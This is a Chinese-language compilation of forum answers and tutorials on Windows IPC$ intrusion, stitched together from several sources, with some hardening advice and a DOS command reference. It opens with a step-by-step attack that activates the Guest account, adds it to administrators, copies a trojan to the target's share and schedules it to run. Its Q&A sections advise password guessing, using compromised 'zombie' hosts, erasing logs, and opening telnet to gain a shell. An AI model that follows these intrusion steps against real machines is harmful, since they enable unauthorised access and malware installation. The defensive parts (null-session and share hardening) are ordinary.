4 )用 telnet 命令連接遠程主機:
telnet 192.168.0.1 90
獲得遠程主機的一個shell;
5 )C:\>net user guest /active:yes
將Guest用戶激活,可以用net user guest 查看帳戶guest 的狀態;
6 )C:\>net user guest 123456
將Guest的密碼改為123456(當然也可以改成其他的密碼);
7 )C:\>net localgroup administrators guest /add
將Guest 賬戶加入到 Administrator管理組中(提升許可權)。通過安全策略的設置,可以禁止guest等帳戶的遠程訪問。
8 )現在我們來走另一條路,給它傳個木馬;
9 )先建立ipc$連接:
C:\>net use \\192.168.0.1 \ipc$ "" /user:administrator
10 )查看目標主機的共享目錄:
C:\>net view \\192.168.0.1
11 )復制木馬客戶端文件到目標主機:
C:\> sihochina.exe \\192.168.0.1\c
12 )查看目標主機當前的系統時間:
net time \\192.168.0.1
13 )用at 命令讓木馬客戶端文件在指定時間運行,目標主機一定要開了Task Scheler服務(允許程序在指定時間運行:
C:\>at \\192.168.0.1 19:00 c:\sihochina.exe
14 )一切OK,剩下的只能等了。
防範ipc$入侵:
1 )禁止空連接進行枚舉(並不能阻止空連接的建立)
方法1:
打開注冊表編輯器,主鍵 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA 下RestrictAnonymous = DWORD的鍵值改為:1 (一個匿名用戶可以連接到IPC$共享,但無法列舉SAM帳號和共享等信息);
方法2:
在本地安全設置-本地策略-安全選項-在「對匿名連接的額外限制」中做相應設置 。
2 )禁止默認共享
★ 察看本地共享資源
運行-->cmd-->net share
★ 刪除共享(重啟後默認共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete
…………………………
★ 停止server服務
net stop server /y (重啟後server服務會重新開啟)
★ 禁止自動打開默認共享(此操作並未關閉ipc$共享)
打開注冊表編輯器:
如果操作系統是server版:
主鍵 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters 下AutoShareServer(DWORD)的鍵值改為:00000000。
如果操作系統是pro版:
主鍵 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters 下AutoShareWks(DWORD)的鍵值改為:00000000。
3 )關閉ipc$和默認共享依賴的服務:server服務
控制面板-->管理工具-->服務-->找到server服務-->屬性-->常規-->啟動類型-->選已禁用
4 )屏蔽139,445埠
★ 139埠可以通過禁止NBT來屏蔽
本地連接-->TCP/IT屬性-->高級-->WINS-->選「禁用TCP/IT上的NETBIOS」一項
★ 445埠可以通過修改注冊表來屏蔽
添加一個鍵值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
修改完後重啟計算機;
★ 設置防火牆進行埠過濾。
5 )設置復雜密碼,防止通過ipc$窮舉出密碼。
ipc$入侵常見問題集錦:
1)進行ipc$入侵的時候,會在伺服器中留下記錄,有什麼辦法可以不讓伺服器發現嗎?
答:留下記錄是一定的,你走後用程序刪除就可以了,或者用肉雞入侵。
2)你看下面的情況是為什麼,可以連接但不能復制
net use \\***.***.***.***\ipc$ "密碼" /user:"用戶名"
命令成功
icmd.exe \\***.***.***.***\admin$
找不到網路路徑
命令不成功
答:可能有兩個原因:
★ 你的許可權不夠,不能訪問默認共享;
★ 對方沒有開啟admin$默認共享,不要認為能進行ipc$連接,對方就一定開了默認共享(很多人都這么以為,誤區!!),此時你可以試試別的默認共享或普通共享,比如c$,d$,c,d等,如果還是不行,就要看你的許可權了,如果是管理員許可權,你可以開telnet,如果能成功,在給它開共享也行。
3)如果對方開了IPC$,且能建立空聯接,但打開C、D盤時,都要求密碼,我知道是空連接沒有太多的許可權,但沒別的辦法了嗎?
答:建議先用流光或者別的什麼猜解一下密碼,如果猜不出來,只能放棄,畢竟空連接的能力有限。
4)我已經猜解到了管理員的密碼,且已經ipc$連接成功了,但net view \\ip發現它沒開默認共享,我該怎麼辦?
答:首先糾正你的一個錯誤,用net view是無法看到默認共享的。既然你現在有管理員許可權,而且對方又開了ipc$,建議你用opentelnet.exe這個小程序打開它的telent,在獲得了這個shell之後,做什麼都可以了。
5)ipc$連接成功後,我用下面的命令建立了一個帳戶,卻發現這個帳戶在我自己的機器上,這是怎麼回事?
答:ipc$建立成功只能說明你與遠程主機建立了通信隧道,並不意味你取得了一個shell,只有在獲得一個shell之後,你才能在遠程建立一個帳戶,否則你的操作只是在本地進行。
6)我已進入了一台肉機,用的管理員帳號,可以看他的系統時間,但是復製程序到他的機子上卻不行,每次都提示「拒絕訪問,已復制0個文件」,是不是對方有什麼服務沒開,我該怎麼辦?
答:不能文件有多個可能,除了許可權不夠外,還可能是對方c$,d$等默認管理共享沒開,或者是對方為NTFS文件格式,通過設置,管理員也未必能遠程寫文件。既然你有管理員許可權,那就開telnet上去吧,然後在開它的共享。
7)我用Win98能與對方建立ipc$連接嗎?
答:不可以的,要進行ipc$的操作,建議用win2000。
8)我用net use \\ip\ipc$ "" /user ""成功的建立了一個空會話,但用nbtstat -A IP 卻無法導出用戶列表,這是為什麼?
答:空會話在默認的情況下是可以導出用戶列表的,但如果管理員通過修改注冊表來禁止導出列表,就會出現你所說的情況;或者你自己的NBT沒有打開,netstat是建立在NBT之上的。
9)我建立ipc$連接的時候返回如下信息:『提供的憑據與已存在的憑據集沖突』,怎麼回事?
答:呵呵,這說明你與目標主機建立了一個以上的ipc$連接,這是不允許的,把其他的刪掉吧:net use \\*.*.*.*\ipc$ /del
10)我在映射的時候出現:
F:\>net use h: \\211.161.134.*\e$
系統發生 85 錯誤。
本地設備名已在使用中。這是怎麼回事?
答:你也太粗心了吧,這說明你的h盤正在使用,映射到別的盤符吧!
11)我建立了一個連接f:\>net use \\*.*.*.*\ipc$ "123" /user:"ccbirds" 成功了,但當我映射時出現了錯誤,向我要密碼,怎麼回事?
F:\>net use h: \\*.*.*.*\c$
密碼在 \\*.*.*.*\c$ 無效。
請鍵入 \\*.*.*.*\c$ 的密碼:
系統發生 5 錯誤。
拒絕訪問。
答:呵呵,向你要密碼說明你當前使用的用戶許可權不夠,不能映射C$這個默認共享,想辦法提升許可權或者找管理員的弱口令吧!默認共享一般是需要管理員許可權的。
12)我用superscan掃到了一個開了139埠的主機,但為什麼不能空連接呢?
答:你混淆了ipc$與139的關系,能進行ipc$連接的主機一定開了139或445埠,但開這兩個埠的主機可不一定能空連接,因為對方可以關閉ipc$共享.
13)我門區域網里的機器大多都是xp,我用流光掃描到幾個administrator帳號口令是空,而且可以連接,但不能復制東西,說錯誤5。請問為什麼?
答:xp的安全性要高一些,在安全策略的默認設置中,對本地帳戶的網路登錄進行身份驗證的時候,默認為來賓許可權,即使你用管理員遠程登錄,也只具有來賓許可權,因此你復制文件,當然是錯誤5:許可權不夠。
14)我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功,可是 net use i: \\192.168.0.2\c 出現請鍵入 \\192.168.0.2 的密碼,怎麼回事情呢?
答:雖然你具有管理員許可權,但管理員在設置c盤共享許可權時可能並未設置允許administrator訪問,所以會出現問題。
15)如果自己的機器禁止了ipc$, 是不是還可以用ipc連接別的機器?
答:可以的。
以上文章轉自我的個人空間:http://hi..com/sihochina
6. 開啟ipc共享
網吧 你連得上就怪..
普通內網 還有可能
net use \\ip\ipc$ "密碼" /user:"帳號"
空連接 不需要輸入 帳號 和密碼 用 "" 代替即可
但是許可權很底
關於ipc$、空連接和默認共享問題
首先需要指出的是空連接和ipc$是不同的概念。空連接是在沒有信任的情況下與伺服器建立的會話,換句話說,它是一個到伺服器的匿名訪問。ipc$是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的許可權。有許多的工具必須用到ipc$。默認共享是為了方便遠程管理而開放的共享,包含了所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。
常見問題和回答:
1,怎樣建立空連接,它有什麼用?
使用命令 net use \\IP\ipc$ "" /user:"" 就可以簡單地和目標建立一個空連接(需要目標開放ipc$)。
對於NT,在默認安全設置下,藉助空連接可以列舉目標用戶、共享,訪問everyone許可權的共享,訪問小部分注冊表等,沒有什麼利用價值。對2000作用就更小了。而且實現也不方便,需藉助工具。
2,為什麼我連不上IPC$?
1,只有nt/2000/xp及以上系統才可以建立ipc$。如果你用的是98/me是沒有該功能的。
2,確認你的命令沒有打錯。正確的命令是: net use \\目標IP\ipc$ "密碼" /user:"用戶名"
注意別多了或少了空格。當用戶名和密碼中不包含空格時兩邊的雙引號可以省略。空密碼用""表示。
3,根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員許可權的,先提升許可權;
錯誤號51,Windows 無法找到網路路徑 : 網路有問題;
錯誤號53,找不到網路路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。
錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)
錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。
3,怎樣打開目標的IPC$?
首先你需要獲得一個不依賴於ipc$的shell,比如sql的cmd擴展、telnet、木馬。當然,這shell必須是admin許可權的。然後你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上一問題可以知道,ipc$能否使用還有很多條件。請確認相關服務都已運行,沒有就啟動它(不知道怎麼做的請看net命令的用法)。還是不行的話(比如有防火牆,殺不了)建議放棄。
4,怎樣映射和訪問默認共享?
使用命令 net use z: \\目標IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤,其他盤類推。
如果已經和目標建立了ipc$,則可以直接用IP加盤符加$訪問。比如 muma.exe \\IP\d$\path\muma.exe 。或者再映射也可以,只是不用用戶名和密碼了:net use y: \\IP\d$ 。然後 muma.exe y:\path\muma.exe 。當路徑中包含空格時,須用""將路徑全引住。
5,如何刪除映射和ipc$連接?
用命令 net use \\IP\ipc$ /del 刪除和一個目標的ipc$連接。
用命令 net use z: /del 刪除映射的z盤,其他盤類推。
用命令 net use * /del 刪除全部。會有提示要求按y確認。
6,連上ipc$然後我能做什麼?
能使用管理員許可權的帳號成功和目標連接ipc$,表示你可以和對方系統做深入「交流」了。你可以使用各種命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)獲得目標信息、管理目標的進程和服務等。如果目標開放了默認共享(沒開你就幫他開),你就可以上傳木馬並運行。也可以用tftp、ftp的辦法上傳。像dwrcc、VNC、RemoteAdmin等工具(木馬)還具有直接控屏的功能。如果是2000server,還可以考慮開啟終端服務方便控制。這里提到的工具的使用,請看自帶的說明或相關教程。
7,怎樣防止別人用ips$和默認共享入侵我?
A、一種辦法是把ipc$和默認共享都刪除了。但重起後還會有。這就需要改注冊表。
1,先把已有的刪除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有幾個刪幾個)
2,禁止建立空連接
首先運行regedit,找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous(DWORD)的鍵值改為:00000001。
3,禁止自動打開默認共享
對於server版,找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的鍵值改為:00000000。
對於pro版,則是[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說的主鍵不存在,就新建一個再改鍵值。
B、另一種是關閉ipc$和默認共享依賴的服務(不推薦)
net stop lanmanserver
可能會有提示說,XXX服務也會關閉是否繼續。因為還有些次要的服務依賴於lanmanserver。一般情況按y繼續就可以了。
C、最簡單的辦法是設置復雜密碼,防止通過ipc$窮舉密碼。但如果你有其他漏洞,ipc$將為進一步入侵提供方便。
D、還有一個辦法就是裝防火牆,或者埠過濾。防火牆的方法就不說了,埠過濾看這里:
過配置本地策略來禁止139/445埠的連接
7. 高手進來
一 摘要
二 什麼是ipc$
三 什麼是空會話
四 空會話可以做什麼
五 ipc$所使用的埠
六 ipc管道在hack攻擊中的意義
七 ipc$連接失敗的常見原因
八 復制文件失敗的原因
九 關於at命令和xp對ipc$的限制
十 如何打開目標的IPC$共享以及其他共享
十一 一些需要shell才能完成的命令
十二 入侵中可能會用到的命令
十三 對比過去和現今的ipc$入侵
十四 如何防範ipc$入侵
十五 ipc$入侵問答精選
一 摘要
注意:本文所討論的各種情況均默認發生在win NT/2000環境下,win98將不在此次討論之列。
二 什麼是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的資源,它是為了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道並以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。IPC$是NT/2000的一項新功能,它有一個特點,即在同一時間內,兩個IP之間只允許建立一個連接。NT/2000在提供了ipc$功能的同時,在初次安裝系統時還打開了默認共享,即所有的邏輯共享(c$,d$,e$……)和系統目錄winnt或windows(admin$)共享。所有的這些,微軟的初衷都是為了方便管理員的管理,但在有意無意中,導致了系統安全性的降低。
平時我們總能聽到有人在說ipc$漏洞,ipc$漏洞,其實ipc$並不是一個真正意義上的漏洞,我想之所以有人這么說,一定是指微軟自己安置的那個『後門』:空會話(Null session)。那麼什麼是空會話呢?
三 什麼是空會話
在介紹空會話之前,我們有必要了解一下一個安全會話是如何建立的。
在Windows NT 4.0中是使用挑戰響應協議與遠程機器建立一個會話的,建立成功的會話將成為一個安全隧道,建立雙方通過它互通信息,這個過程的大致順序如下:
1)會話請求者(客戶)向會話接收者(伺服器)傳送一個數據包,請求安全隧道的建
立;
2)伺服器產生一個隨機的64位數(實現挑戰)傳送回客戶;
3)客戶取得這個由伺服器產生的64位數,用試圖建立會話的帳號的口令打亂它,將結
果返回到伺服器(實現響應);
4)伺服器接受響應後發送給本地安全驗證(LSA),LSA通過使用該用戶正確的口令來核實響應以便確認請求者身份。如果請求者的帳號是伺服器的本地帳號,核實本地發生;如果請求的帳號是一個域的帳號,響應傳送到域控制器去核實。當對挑戰的響應核實為正確後,一個訪問令牌產生,然後傳送給客戶。客戶使用這個訪問令牌連接到伺服器上的資源直到建議的會話被終止。
以上是一個安全會話建立的大致過程,那麼空會話又如何呢?
空會話是在沒有信任的情況下與伺服器建立的會話(即未提供用戶名與密碼),但根據WIN2000的訪問控制模型,空會話的建立同樣需要提供一個令牌,可是空會話在建立過程中並沒有經過用戶信息的認證,所以這個令牌中不包含用戶信息,因此,這個會話不能讓系統間發送加密信息,但這並不表示空會話的令牌中不包含安全標識符SID(它標識了用戶和所屬組),對於一個空會話,LSA提供的令牌的SID是S-1-5-7,這就是空會話的SID,用戶名是:ANONYMOUS LOGON(這個用戶名是可以在用戶列表中看到的,但是是不能在SAM資料庫中找到,屬於系統內置的帳號),這個訪問令牌包含下面偽裝的組:
Everyone
Network
在安全策略的限制下,這個空會話將被授權訪問到上面兩個組有權訪問到的一切信息。那麼建立空會話到底可以作什麼呢?
四 空會話可以做什麼
對於NT,在默認安全設置下,藉助空連接可以列舉目標主機上的用戶和共享,訪問everyone許可權的共享,訪問小部分注冊表等,並沒有什麼太大的利用價值;對2000作用更小,因為在Windows 2000 和以後版本中默認只有管理員和備份操作員有權從網路訪問到注冊表,而且實現起來也不方便,需藉助工具。
從這些我們可以看到,這種非信任會話並沒有多大的用處,但從一次完整的ipc$入侵來看,空會話是一個不可缺少的跳板,因為我們從它那裡可以得到戶列表,而大多數弱口令掃描工具就是利用這個用戶列表來進行口令猜解的,成功的導出用戶列表大大增加了猜解的成功率,僅從這一點,足以說明空會話所帶來的安全隱患,因此說空會話毫無用處的說法是不正確的。以下是空會話中能夠使用的一些具體命令:
1 首先,我們先建立一個空連接(當然,這需要目標開放ipc$)
命令:net use \\ip\ipc$ "" /user:""
注意:上面的命令包括四個空格,net與use中間有一個空格,use後面一個,密碼左右各一個空格。
2 查看遠程主機的共享資源
命令:net view \\ip
解釋:前提是建立了空連接後,用此命令可以查看遠程主機的共享資源,如果它開了共享,可以得到如下面的結果,但此命令不能顯示默認共享。
在 \\*.*.*.*的共享資源
資源共享名 類型 用途 注釋
-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看遠程主機的當前時間
命令: net time \\ip
解釋:用此命令可以得到一個遠程主機的當前時間。
4 得到遠程主機的NetBIOS用戶名列表(需要打開自己的NBT)
命令:nbtstat -A ip
用此命令可以得到一個遠程主機的NetBIOS用戶名列表,返回如下結果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
以上就是我們經常使用空會話做的事情,好像也能獲得不少東西喲,不過要注意一點:建立IPC$連接的操作會在Event Log中留下記錄,不管你是否登錄成功。 好了,那麼下面我們就來看看ipc$所使用的埠是什麼?
五 ipc$所使用的埠
首先我們來了解一些基礎知識:
1 SMB:(Server Message Block) Windows協議族,用於文件列印共享的服務;
2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)埠實現基於TCP/IP協議的NETBIOS網路互聯。
3 在WindowsNT中SMB基於NBT實現,即使用139(TCP)埠;而在Windows2000中,SMB除了基於NBT實現,還可以直接通過445埠實現。
有了這些基礎知識,我們就可以進一步來討論訪問網路共享對埠的選擇了:
對於win2000客戶端(發起端)來說:
1 如果在允許NBT的情況下連接伺服器時,客戶端會同時嘗試訪問139和445埠,如果445埠有響應,那麼就發送RST包給139埠斷開連接,用455埠進行會話,當445埠無響應時,才使用139埠,如果兩個埠都沒有響應,則會話失敗;
2 如果在禁止NBT的情況下連接伺服器時,那麼客戶端只會嘗試訪問445埠,如果445埠無響應,那麼會話失敗。
對於win2000伺服器端來說:
1 如果允許NBT, 那麼UDP埠137, 138, TCP 埠 139, 445將開放(LISTENING);
2 如果禁止NBT,那麼只有445埠開放。
我們建立的ipc$會話對埠的選擇同樣遵守以上原則。顯而易見,如果遠程伺服器沒有監聽139或445埠,ipc$會話是無法建立的。
六 ipc管道在hack攻擊中的意義
ipc管道本來是微軟為了方便管理員進行遠程管理而設計的,但在入侵者看來,開放ipc管道的主機似乎更容易得手。通過ipc管道,我們可以遠程調用一些系統函數(大多通過工具實現,但需要相應的許可權),這往往是入侵成敗的關鍵。如果不考慮這些,僅從傳送文件這一方面,ipc管道已經給了入侵者莫大的支持,甚至已經成為了最重要的傳輸手段,因此你總能在各大論壇上看到一些朋友因為打不開目標機器的ipc管道而一籌莫展大呼救命。當然,我們也不能忽視許可權在ipc管道中扮演的重要角色,想必你一定品嘗過空會話的尷尬,沒有許可權,開啟管道我們也無可奈何。但入侵者一旦獲得了管理員的許可權,那麼ipc管道這把雙刃劍將顯示出它猙獰的一面。
七 ipc$連接失敗的常見原因
以下是一些常見的導致ipc$連接失敗的原因:
1 IPC連接是Windows NT及以上系統中特有的功能,由於其需要用到Windows NT中很多DLL函數,所以不能在Windows 9.x/Me系統中運行,也就是說只有nt/2000/xp才可以相互建立ipc$連接,98/me是不能建立ipc$連接的;
2 如果想成功的建立一個ipc$連接,就需要響應方開啟ipc$共享,即使是空連接也是這樣,如果響應方關閉了ipc$共享,將不能建立連接;
3 連接發起方未啟動Lanmanworkstation服務(顯示名為:Workstation):它提供網路鏈結和通訊,沒有它發起方無法發起連接請求;
4 響應方未啟動Lanmanserver服務(顯示名為:Server):它提供了 RPC 支持、文件、列印以及命名管道共享,ipc$依賴於此服務,沒有它主機將無法響應發起方的連接請求,不過沒有它仍可發起ipc$連接;
5 響應方未啟動NetLogon,它支持網路上計算機 pass-through 帳戶登錄身份(不過這種情況好像不多);
6 響應方的139,445埠未處於監聽狀態或被防火牆屏蔽;
7 連接發起方未打開139,445埠;
8 用戶名或者密碼錯誤:如果發生這樣的錯誤,系統將給你類似於'無法更新密碼'這樣的錯誤提示(顯然空會話排除這種錯誤);
9 命令輸入錯誤:可能多了或少了空格,當用戶名和密碼中不包含空格時兩邊的雙引號可以省略,如果密碼為空,可以直接輸入兩個引號""即可;
10 如果在已經建立好連接的情況下對方重啟計算機,那麼ipc$連接將會自動斷開,需要重新建立連接。
另外,你也可以根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問:很可能你使用的用戶不是管理員許可權的;
錯誤號51,Windows無法找到網路路徑:網路有問題;
錯誤號53,找不到網路路徑:ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名:你的lanmanworkstation服務未啟動或者目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突:你已經和對方建立了一個ipc$,請刪除再連;
錯誤號1326,未知的用戶名或錯誤密碼:原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動:目標NetLogon服務未啟動;
錯誤號2242,此用戶的密碼已經過期:目標有帳號策略,強制定期要求更改密碼。
8. 為什麼我在格式化的時候會出現。不是內部或外部命令,也不是可運行的程序
命令:
dir 列文件名 deltree 刪除目錄樹 cls 清屏 cd 改變當前目錄
拷貝文件 disk 復制磁碟 del 刪除文件 format 格式化磁碟
edit 文本編輯 mem 查看內存狀況 md 建立子目錄 move 移動文件、改目錄名
more 分屏顯示 type 顯示文件內容 rd 刪除目錄 sys 製作DOS系統盤
ren 改變文件名 x 拷貝目錄與文件 chkdsk 檢查磁碟 attrib 設置文件屬性
fdisk 硬碟分區 date 顯示及修改號期 label 設置卷標號 defrag 磁碟碎片整理
msd 系統檢測 path 設置搜尋目錄 share 文件共享 memmaker內存優化管理
help 幫助 restore 恢復備份文件 set 設置環境變數 time 顯示及修改時間
tree 列目錄樹 debug 隨機調試程序 doskey 重新調用DOS命令 prempt 設置提示符 undelete恢復被刪的文件 scandisk檢測、修理磁碟
常用命令具體介紹:
一、Dir
顯示目錄文件和子目錄列表,呵呵,這個當然是人人要知道的。
可以使用通配符(? 和 *),?表通配一個字元,*表通配任意字元
*.後綴
指定要查看後綴的文件。 上面其實也可以為「 . 後綴」,例如dir *.exe 等於dir .exe
/p
每次顯示一個列表屏幕。要查看下一屏,請按鍵盤上的任意鍵。
/w
以寬格式顯示列表,在每一行上最多顯示 5 個文件名或目錄名。
/s
列出指定目錄及所有子目錄中出現的每個指定的文件名。比win環境下的查找快多了
dir *.* -> a.txt 把當前目錄文件列表寫入a.txt
dir *.* /s -> a.txt 把當前目錄文件列表寫入a.txt,包括子目錄下文件。
二、Attrib
顯示、設置或刪除指派給文件或目錄的只讀、存檔、系統以及隱藏屬性。如果在不含參數的情況下使用,則 attrib 會顯示當前目錄中所有文件的屬性。
+r
設置只讀屬性。
-r
清除只讀屬性。
+a
設置存檔文件屬性。
-a
清除存檔文件屬性。
+s
設置系統屬性。
-s
清除系統屬性。
+h
設置隱藏屬性。
-h
清除隱藏屬性。
三、Cls
清除顯示在命令提示符窗口中的所有信息,並返回空窗口,即「清屏」
四、Exit
退出當前命令解釋程序並返回到系統。
五、format
格式化
/q
執行快速格式化。刪除以前已格式化卷的文件表和根目錄,但不在扇區之間掃描損壞區域。使用 /q 命令行選項應該僅格式化以前已格式化的完好的卷。
六、Ipconfig
顯示所有當前的 TCP/IP 網路配置值、刷新動態主機配置協議 (DHCP) 和域名系統 (DNS) 設置。使用不帶參數的 ipconfig 可以顯示所有適配器的 IP 地址、子網掩碼、默認網關。
/all
顯示所有適配器的完整 TCP/IP 配置信息。
ipconfig 等價於 winipcfg,後者在ME、98 和 95 上可用。盡管 Windows XP 沒有提供象 winipcfg 命令一樣的圖形化界面,但可以使用「網路連接」查看和更新 IP 地址。要做到這一點,請打開 網路連接,右鍵單擊某一網路連接,單擊「狀態」,然後單擊「支持」選項卡。
該命令最適用於配置為自動獲取 IP 地址的計算機。它使用戶可以確定哪些 TCP/IP 配置值是由 DHCP、自動專用 IP 地址 (APIPA) 和其他配置配置的。
七、md
創建目錄或子目錄
八、Move
將一個或多個文件從一個目錄移動到指定的目錄。
九、Nbtstat
顯示本地計算機和遠程計算機的基於 TCP/IP (NetBT) 協議的 NetBIOS 統計資料、NetBIOS 名稱表和 N
etBIOS 名稱緩存。Nbtstat 可以刷新 NetBIOS 名稱緩存和注冊的 Windows Internet 名稱服務 (WINS) 名稱。使用不帶參數的 nbtstat 顯示幫助。Nbtstat 命令行參數區分大小寫。
-a remotename
顯示遠程計算機的 NetBIOS 名稱表,其中,RemoteName 是遠程計算機的 NetBIOS 計算機名稱。
-A IPAddress
顯示遠程計算機的 NetBIOS 名稱表,其名稱由遠程計算機的 IP 地址指定(以小數點分隔)。
十、Netstat
顯示活動的 TCP 連接、計算機偵聽的埠、乙太網統計信息、IP 路由表、IPv4 統計信息(對於 IP、ICMP、TCP 和 UDP 協議)以及 IPv6 統計信息(對於 IPv6、ICMPv6、通過 IPv6 的 TCP 以及通過 IPv6 的 UDP 協議)。使用時如果不帶參數,netstat 顯示活動的 TCP 連接。
-a
顯示所有活動的 TCP 連接以及計算機偵聽的 TCP 和 UDP 埠。
十一、Ping
通過發送「網際消息控制協議 (ICMP)」回響請求消息來驗證與另一台 TCP/IP 計算機的 IP 級連接。回響應答消息的接收情況將和往返過程的次數一起顯示出來。Ping 是用於檢測網路連接性、可到達性和名稱解析的疑難問題的主要 TCP/IP 命令。如果不帶參數,ping 將顯示幫助。名稱和Ip地址解析是它的最簡單應用也是用的最多的。
-t
指定在中斷前 ping 可以持續發送回響請求信息到目的地。要中斷並顯示統計信息,請按 CTRL-BREAK。要中斷並退出 ping,請按 CTRL-C。
-lSize
指定發送的回響請求消息中「數據」欄位的長度(以位元組表示)。默認值為 32。size 的最大值是 65,527。
十二、Rename (Ren)
更改文件的名稱。
例如 ren *.abc *.cba
十三、Set
顯示、設置或刪除環境變數。如果沒有任何參數,set 命令將顯示當前環境設置。
十四、Shutdown
允許您關閉或重新啟動本地或遠程計算機。如果沒有使用參數,shutdown 將注銷當前用戶。
-m ComputerName
指定要關閉的計算機。
-t xx
將用於系統關閉的定時器設置為 xx 秒。默認值是 20 秒。
-l
注銷當前用戶,這是默認設置。-m ComputerName 優先。
-s
關閉本地計算機。
-r
關閉之後重新啟動。
-a
中止關閉。除了 -l 和 ComputerName 外,系統將忽略其它參數。在超時期間,您只可以使用 -a。
十五、System File Checker (sfc)
win下才有,在重新啟動計算機後掃描和驗
證所有受保護的系統文件。
/scannow
立即掃描所有受保護的系統文件。
/scanonce
一次掃描所有受保護的系統文件。
/purgecache
立即清除「Windows 文件保護」文件高速緩存,並掃描所有受保護的系統文件。
/cachesize=x
設置「Windows 文件保護」文件高速緩存的大小,以 MB 為單位。
十六、type
顯示文本文件的內容。使用 type 命令查看文本文件或者是bat文件而不修改文件
十七、Tree
圖像化顯示路徑或驅動器中磁碟的目錄結構。
十八、X
復制文件和目錄,包括子目錄。
/s
復制非空的目錄和子目錄。如果省略 /s,x 將在一個目錄中工作。
/e
復制所有子目錄,包括空目錄。
十九、
將一個或多個文件從一個位置復制到其他位置
二十、del
刪除指定文件。
ftp和bat批命令和net和telnet由於子命令太多,這里不說了,不過這幾個都是常用到的。
IPC$命令詳解:
網上關於ipc$入侵的文章可謂多如牛毛,而且也不乏優秀之作,攻擊步驟甚至可以說已經成為經典的模式,因此也沒人願意再把這已經成為定式的東西拿出來擺弄.
不過話雖這樣說,但我個人認為這些文章講解的並不詳細,對於第一次接觸ipc$的菜鳥來說,簡單的羅列步驟並不能解答他們的許多迷惑(你隨便找一個hack論壇搜一下ipc,看存在的疑惑有多少).
因此我寫了這篇相當於解惑的教程.想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!如果你看完這篇帖子仍有疑問,請馬上回復!
二 什麼是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這么說的),它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的許可權,在遠程管理計算機和查看計算機的共享資源時使用。
利用IPC$,連接者甚至可以與目標主機建立一個空的連接而無需用戶名與密碼(當然,對方機器必須開了ipc$共享,否則你是連接不上的),而利用這個空的連接,連接者還可以得到目標主機上的用戶列表(不過負責的管理員會禁止導出用戶列表的)。
我們總在說ipc$漏洞ipc$漏洞,其實,ipc$並不是真正意義上的漏洞,它是為了方便管理員的遠程管理而開放的遠程網路登陸功能,而且還打開了默認共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$)。
所有的這些,初衷都是為了方便管理員的管理,但好的初衷並不一定有好的收效,一些別有用心者(到底是什麼用心?我也不知道,代詞一個)會利用IPC$,訪問共享資源,導出用戶列表,並使用一些字典工具,進行密碼探測,寄希望於獲得更高的許可權,從而達到不可告人的目的.
解惑:
1)IPC連接是Windows NT及以上系統中特有的遠程網路登陸功能,其功能相當於Unix中的Telnet,由於IPC$功能需要用到Windows NT中的很多DLL函數,所以不能在Windows 9.x中運行。
也就是說只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假,不過現在都2003年了,建議98的同志換一下系統吧,98不爽的)
2)即使是空連接也不是100%都能建立成功,如果對方關閉了ipc$共享,你仍然無法建立連接
